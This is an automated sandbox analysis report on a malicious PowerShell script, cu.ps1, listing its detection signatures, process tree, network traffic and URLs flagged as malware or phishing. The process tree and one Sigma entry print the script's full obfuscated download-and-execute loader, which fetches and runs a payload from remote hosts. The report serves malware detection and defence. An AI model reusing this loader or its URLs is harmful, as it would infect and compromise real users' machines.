Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
cu.ps1

Overview

General Information

Sample name:cu.ps1
Analysis ID:1568998
MD5:ffe670c96b95f411565aad0ed1bd8826
SHA1:2069824f37cedac9e4ac4fdd68cbdf9903469d25
SHA256:981751d5f3e0745c63ebbb34a2007ad61bc16c407f57173cb5f315e9ec9e5972
Tags:Listofrequireditemsps1user-JAMESWT_MHT
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Yara detected Powershell download and execute
AI detected suspicious sample
Loading BitLocker PowerShell Module
Obfuscated command line found
Powershell creates an autostart link
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Scan Loop Network
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 7372 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cu.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7584 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\ik473a.vbs'" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • wscript.exe (PID: 7956 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\Public\tq5.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
      • powershell.exe (PID: 8008 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok RekoeUdmaa) exp, ');sanktionjtr (gaardspladsens 'Nouve$FrankgA.romlE,ponoThirdbVar,eaC eckl Angi:FurfuPFolliaBj.rgr BrneaSy pllMgli a ugerlD,nceiNonteaClosk=.epid$SkovgU DyslnGasliyMelaetsnesetDubbaiT,dtag Ov.rsIm.untAgrar. RejosP cnopKnaldlUdstriEnalitusik,( Comb$AfblnDA.iseePer,gaquiltkBountt.arnaighanevIntuieFremfr Impie Hu.gnUheldd LufteAto a) Sile ');sanktionjtr (gaardspladsens 'Ty,hl[Re.roNGa.teeAnskutNedsa.LilleS Forde Ind rMechovHistriBronzcUdvinejalo,PQualio wi niT ksan Tr.mtTra.iMToldva U.henDe phaSpansgHybrieDecarrBottl]Inder:Mi.un:UntraSst vse B,gvcInd auGietirLselyikva,ttLout.yTamanPArgierFjo.toAnmartIntero LigncUnsweo He slFgte Sigh.=Profe Sexga[R.klaNGged eBuddhtCyclo. SpheSsto.leRetaxcBijouuMessirRugnii,lidft KalvyKo mePPligtrHurraoChar tPaintoH.drac SelmoAur.clpulicTBa.isyRetropSkulle Be r]Multi:im.fs:Lsel Tta celmobilsNodia1 ejs2Chart ');$Unyttigst=$Paralalia[0];$Sportshelt= (gaardspladsens 'Urinv$ ,onog Di,ul.osanoNondibvrts,aDaughlOrtho:Ek alHGoa taHirude m.ldmFraukoUnintpContar inteotomogtDereieArbeju UdensLeu.o5Una.a3Snown=scopiNLiskae Undewbalda- .limOIntimbH enejF,ktoeJack.c Ps ctSpini Lab,SFa.veyLodsns.peletSaurueFejl.mKr kk.Scal NB.screHoftetFlers.Prin,WLiti,e uwarbv,ndiCUpbuilUnsigiBel ne Causn akset');$Sportshelt+=$Udsmeltningen[1];sanktionjtr ($Sportshelt);sanktionjtr (gaardspladsens ' alvf$P.risHLaerea,raineEskadm Foreoco,iop FortrNynazo Misdt Hexye PhotuKahausFl.ve5Ne.ro3dixli.SabbaH sveseF,revaLiljedIndspe P adrFuglesPreim[Gsac $Mas.iFSkovta Paasn PoolgAntifsK,pittTili,k Panin,iheni MetavLqwbee Gir,nTri.isExend]Overa= Fisk$EretrFSkviso Fla rEnsemlElaf nConteg SkrueAirstl ErfasTypeaeUnderr O.hasPlayb ');$Frstepladserne=gaardspladsens 'Upres$trideHRe veaPhysieStannmMinstoNondupIlma rmuseto Damptpr.geeImidouBommesHuman5No,ex3Uaktu. CyniDInklioTranswSigisnSm.rtlBeclooSemica Vindd Uno.FUp,igi Bilil KataeP,ash(Til a$SpdbrURestin,enziyAst ot rndstlkkeriKalkbgUncoms D.satA,lur, Selv$ArbitSStrafv .jereLuskejPochosCawineAuspirTypehePs.ud)Mm.rl ';$Svejsere=$Udsmeltningen[0];sanktionjtr (gaardspladsens 'Stand$,ytotgVarkal Tr,aoBoxlibCebriaBehanlMobil:wormsRAmm,nePunits Isdee Heiim Ste,bM.cerlGrentaAcetab askl FiceeCo.on=Recon(hofmaT,ndreeStu fsElekttpickp- ButtPUnempaFunktt Adr hdegra B nkr$Barn.STt.ekvThyroeCout.j SarasTibbie S ndrUdsp.ePrimu)Vasif ');while (!$Resemblable) {sanktionjtr (gaardspladsens 'Mango$ IliogArb jlCombpo Gipsbfi keaB,litl and:BacciU InornMazareUfat lDramaa Ulf.bDampso tormrAktena Acidt Bokoe S.nslMalocyvelli=Fa gl$BlacktPennyr Brumu.akfjeH pog ') ;sanktionjtr $Frstepladserne;sanktionjtr (gaardspladsens ' Ga,eSAnoretSmasha,ildvr,oncetForci-StillSLinjelformue Moboe Skrap Skif aller4Nicke ');sanktionjtr (gaardspladsens ' Grap$Falkegm,ctulAppelo AnlgbForstaTory,l Tine:ElectR Slideamatrs Dre e SvavmDelinblivsrlSatyraThomibUdskilCocree wird=adapi(ReamuTKseb.eUnives A,detGhett-GhettP OrgaaPa.hytWasseh Amat .eolp$veterSIndvivAm,uleTra.sjM sstsDuffieO nirr rgfoe Forb)Outa. ') ;sanktionjtr (gaardspladsens 'Lgter$IndopgAimlelro tio CorcbOuts.aT.glvlArrhy:PulchVOlie,eHomeonFre.sufo,gasA cohhIntera.upidaMonarrMaske= Uhde$GriflgSvinal,eekeo FilmbOchera D.lelagfas: epokKMa mil Loudoallots emoneArriltSkidtt handeUfordrVulgan UnrueTakhas Coff+Newfa+qu,ry%Spise$KitteP AfplaAstigrEarboaPersplFa ilaExsanl Srvei U staPorta.TangecCompoo Mlkeu,olban overt Blod ') ;$Unyttigst=$Paralalia[$Venushaar];}$Relationsnavne=334162;$Fraflytter=29582;sanktionjtr (gaardspladsens 'Falu $ crosgSerielUnfenoRefrib ElspaMelanlFrame:P,votNGonotoAnsjons ptldDiseqiC pyrsS.lfus riftiSc,urpTekstaSlikmt Aa,eeLykkedRubrilAf,ejytrilr besky=Spiru .etskG SynseMaskit Subs-materCHustao.defonAnsvatMil.beSkuern B.rgtAppea Ploug$SemaeSSuspevM dlaePassejSprins Rac,ePlonkrAdmiteSound ');sanktionjtr (gaardspladsens 'Inapp$Marsigblon lAr,tho SkolbBedstaOp uslCoccy:OvergSSkorzuFireap GlazeOpmunrDal,ts Wiene .nrec No.crFl.mme rudttOmk aiP,admo OvarnScree Udvi=St,an V st[amen SStammyGenres KvabtAmo,peS.rafmSmitt.Un,ipCRespioFi,tnnPr grv Poc eG,naerSamdetcoope]hinde:Kompr:KrykhFGlendrPolyeoB.tonmVed,rBGersoaAnacas StineNon.e6 Tidl4RivalS isket.atchr bsiti rikenaltrigGenae(Co.ka$IncitNMisimothu,nnHaanddH.vegiUnr.vsSandbsWomaniKosyspProteaMaskit re.reVal,dd HulklHo,edyFet,r)Svov. ');sanktionjtr (gaardspladsens 'Ka.kv$Ko,plg ,adelLimi.oCa cibUgenna UmenlLithi: BourAMetacrSekune Gurso Ha,dg Sup rD.staaSubsipOp.rvhpik,me oldorkonom Monst=Garni Scabr[D bleSUdtynyTapiosA.hudtBekose.edemmMarti.DibleTNeur,e S,gexSubautmorp .SkrifEDe epn SkadcMicrooPar gdF,gseiProdunBlomsgRecom]Milor:Ypsil:AngloANo.anSexarcCDriftI Ey pICadis.UnmilG acaneGuldstMurexSm rgitEft rrUdatei An inAttaigIsole(Uds.r$InterSIndisu.rtmapU,chaeTriazrTlpersFrstee Laerc oplr ObpyeNegrotUnc,nixenoloPlintnNonid)W nds ');sanktionjtr (gaardspladsens 'Bedre$Shan g misbl ingeoVestubKoorda Pettl.bebo: Nystn Quira ntipcikorh HalltB,conh MelaeProvenBoff.iRea dcAgate=deskt$ Kil,A EfterHool.e MechoAr ejgChastrHylstaUnnotpTurrihForudeA,rsdrNatur. SlhusBoissuou,lib,ventsDo.umtUnebrrGledeiFldstnHortegSvige(Lgdom$FodboRCam teForlol AnveaFoldetA.onyiCon,eoCo panTvrersPolitnSkspoa Th,uvRelegn Smele To k,Phase$EjendF kl,arServiaAllitf AfmulTyre.yAntiotOcta.tHonnreDigenrKaard)Petro ');sanktionjtr $naphthenic;" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 8016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 8124 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Succesfulde.blo && echo t" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 7372JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
    Process Memory Space: powershell.exe PID: 8008JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

      Other

      SourceRuleDescriptionAuthorStrings
      amsi64_7372.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
        amsi64_8008.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: Potentially Suspicious PowerShell Child Processes
          Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\tq5.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\tq5.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cu.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7372, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\tq5.vbs" , ProcessId: 7956, ProcessName: wscript.exe
          Sigma detected: Script Interpreter Execution From Suspicious Folder
          Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\tq5.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\tq5.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cu.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7372, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\tq5.vbs" , ProcessId: 7956, ProcessName: wscript.exe
          Sigma detected: Suspicious PowerShell Parameter Substring
          Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\ik473a.vbs'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\ik473a.vbs'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cu.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7372, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\ik473a.vbs'", ProcessId: 7584, ProcessName: powershell.exe
          Sigma detected: WScript or CScript Dropper
          Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\tq5.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\tq5.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cu.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7372, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\tq5.vbs" , ProcessId: 7956, ProcessName: wscript.exe
          Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
          Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7372, TargetFilename: C:\Users\Public\tq5.vbs
          Sigma detected: Change PowerShell Policies to an Insecure Level
          Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cu.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cu.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cu.ps1", ProcessId: 7372, ProcessName: powershell.exe
          Sigma detected: Potential Binary Or Script Dropper Via PowerShell
          Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7372, TargetFilename: C:\Users\Public\tq5.vbs
          Sigma detected: Suspicious Scan Loop Network
          Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok RekoeUdmaa) exp, ');sanktionjtr (gaardspladsens 'Nouve$Fra
          Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
          Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\tq5.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\tq5.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cu.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7372, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\tq5.vbs" , ProcessId: 7956, ProcessName: wscript.exe
          Sigma detected: Non Interactive PowerShell Process Spawned
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cu.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cu.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cu.ps1", ProcessId: 7372, ProcessName: powershell.exe

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-12-05T10:39:40.070592+010028033053Unknown Traffic192.168.2.949712184.171.244.231443TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus / Scanner detection for submitted sample
          Source: cu.ps1Avira: detected
          Antivirus detection for URL or domain
          Source: https://www.erp-royal-crown.info/wh/SubordinerenAvira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/SubordinerendAvira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/SubordinerendeAvira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.infoAvira URL Cloud: Label: phishing
          Source: http://www.erp-royal-crown.infoAvira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/SubordineAvira URL Cloud: Label: phishing
          Source: https://www.pineappletech.ae/na/mg.vbsAvira URL Cloud: Label: malware
          Source: https://www.erp-royal-crown.info/wh/Avira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/Subordinerendes78.smipAvira URL Cloud: Label: phishing
          Source: https://www.fornid.com/wh/List%20of%20required%20items%20and%20services.pdfAvira URL Cloud: Label: malware
          Source: https://www.erp-royal-crown.info/wh/SubordAvira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wAvira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/Subordinerendes78.smiAvira URL Cloud: Label: malware
          Source: https://www.almrwad.com/wh/Subordinerendes78.smiAvira URL Cloud: Label: malware
          Source: https://www.erp-royal-crown.info/whAvira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/SubordinereAvira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/SuborAvira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/SubordiAvira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/SuboAvira URL Cloud: Label: phishing
          Source: http://erp-royal-crown.infoAvira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/SubordinerendesAvira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/Subordinerendes78.sAvira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/SubordinAvira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/Subordinerendes78Avira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/Su0Avira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/Subordinerendes7Avira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/Avira URL Cloud: Label: phishing
          Multi AV Scanner detection for submitted file
          Source: cu.ps1ReversingLabs: Detection: 31%
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.4% probability
          Source: unknownHTTPS traffic detected: 93.95.216.175:443 -> 192.168.2.9:49709 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 91.193.42.13:443 -> 192.168.2.9:49710 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 184.171.244.231:443 -> 192.168.2.9:49711 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 148.251.114.233:443 -> 192.168.2.9:49713 version: TLS 1.2
          Source: Binary string: System.Management.Automation.pdb_ source: powershell.exe, 00000003.00000002.1554617977.000002A67CA47000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: m.Core.pdb source: powershell.exe, 00000007.00000002.2755751802.00000225370D5000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1553526249.000002A67C920000.00000004.00000020.00020000.00000000.sdmp
